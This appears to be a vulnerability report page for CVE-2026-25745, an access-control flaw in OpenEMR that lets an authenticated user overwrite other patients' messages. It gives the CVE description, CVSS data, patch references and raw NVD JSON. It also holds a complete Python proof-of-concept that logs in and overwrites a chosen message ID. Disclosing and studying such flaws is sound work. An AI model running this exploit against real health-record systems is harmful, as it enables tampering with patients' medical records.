Security Vulnerability Report
CVE-2026-25745 CVSS 6.5 MEDIUM

CVE-2026-25745

Published: 2026-03-18 21:16:25
Last Modified: 2026-03-20 19:16:14

Description

OpenEMR is a free and open source electronic health records and medical practice management application. In versions up to and including 8.0.0, the message/note update endpoint (e.g. PUT or POST) updates by message/note ID only and does not verify that the message belongs to the current patient (or that the user is allowed to edit that patient’s notes). An authenticated user with notes permission can modify any patient’s messages by supplying another message ID. Commit 92a2ff9eaaa80674b3a934a6556e35e7aded5a41 contains a fix for the issue.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* - VULNERABLE
OpenEMR <= 8.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2026-25745 PoC - OpenEMR IDOR Vulnerability
# Target: OpenEMR <= 8.0.0
# Vulnerability: Insecure Direct Object Reference in message/note update endpoint

TARGET_URL = "http://target-openemr.local"  # Replace with actual target
LOGIN_URL = f"{TARGET_URL}/interface/main/main.php"
MESSAGE_UPDATE_URL = f"{TARGET_URL}/interface/patient_file/summary/add_mailbox.php"

# Authentication credentials
USERNAME = "attacker_account"
PASSWORD = "attacker_password"


def login(session, username, password):
    """Authenticate to OpenEMR"""
    login_data = {
        "authToken": "",
        "authDomain": "",
        "username": username,
        "password": password,
        "redirect": "/interface/main/main.php",
        "auth": "standard",
    }
    response = session.post(LOGIN_URL, data=login_data)
    return response.status_code == 200


def exploit_idor(session, target_message_id, malicious_content):
    """
    Exploit the IDOR vulnerability by updating another patient's message

    Args:
        session: Authenticated requests session
        target_message_id: ID of the target patient's message to modify
        malicious_content: New content to inject

    Returns:
        Response from the server
    """
    # Malicious request - no validation of message ownership
    update_data = {
        "form_id": target_message_id,  # Arbitrary message ID from other patient
        "form_note": malicious_content,
        "form_activity": "1",
        "mode": "save",
    }
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "X-Requested-With": "XMLHttpRequest",
    }
    response = session.post(MESSAGE_UPDATE_URL, data=update_data, headers=headers)
    return response


def main():
    session = requests.Session()

    # Step 1: Login with low-privilege account
    print("[*] Logging in to OpenEMR...")
    if not login(session, USERNAME, PASSWORD):
        print("[-] Authentication failed")
        return
    print("[+] Authentication successful")

    # Step 2: Exploit IDOR - modify another patient's message
    # Target message ID can be enumerated or guessed
    target_msg_id = 12345  # Replace with actual target message ID
    injected_content = "MALICIOUS_MODIFIED_CONTENT"

    print(f"[*] Attempting to modify message ID: {target_msg_id}")
    response = exploit_idor(session, target_msg_id, injected_content)

    if response.status_code == 200:
        print("[+] IDOR exploit successful - message modified without ownership check")
    else:
        print(f"[-] Exploit failed with status: {response.status_code}")


if __name__ == "__main__":
    main()

References

https://github.com/openemr/openemr/commit/92a2ff9eaaa80674b3a934a6556e35e7aded5a41 (Patch)
https://github.com/openemr/openemr/security/advisories/GHSA-jm78-x5p7-52qh (Exploit, Vendor Advisory)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-25745",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-18T21:16:25.043",
    "lastModified": "2026-03-20T19:16:13.617",
    "vulnStatus": "Modified",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "OpenEMR is a free and open source electronic health records and medical practice management application. In versions up to and including 8.0.0, the message/note update endpoint (e.g. PUT or POST) updates by message/note ID only and does not verify that the message belongs to the current patient (or that the user is allowed to edit that patient’s notes). An authenticated user with notes permission can modify any patient’s messages by supplying another message ID. Commit 92a2ff9eaaa80674b3a934a6556e35e7aded5a41 contains a fix for the issue."
      },
      {
        "lang": "es",
        "value": "OpenEMR es una aplicación gratuita y de código abierto de registros de salud electrónicos y gestión de consultorios médicos. En versiones hasta la 8.0.0 inclusive, el punto final de actualización de mensajes/notas (por ejemplo, PUT o POST) actualiza solo por ID de mensaje/nota y no verifica que el mensaje pertenezca al paciente actual (o que el usuario tiene permiso para editar las notas de ese paciente). Un usuario autenticado con permiso de notas puede modificar los mensajes de cualquier paciente al proporcionar otro ID de mensaje. El commit 92a2ff9eaaa80674b3a934a6556e35e7aded5a41 contiene una solución para el problema."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-639"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:*",
                "versionEndIncluding": "8.0.0",
                "matchCriteriaId": "1D995E4F-C6E0-47AC-9F5A-4E828BA9A292"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/openemr/openemr/commit/92a2ff9eaaa80674b3a934a6556e35e7aded5a41",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/openemr/openemr/security/advisories/GHSA-jm78-x5p7-52qh",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      },
      {
        "url": "https://github.com/openemr/openemr/security/advisories/GHSA-jm78-x5p7-52qh",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}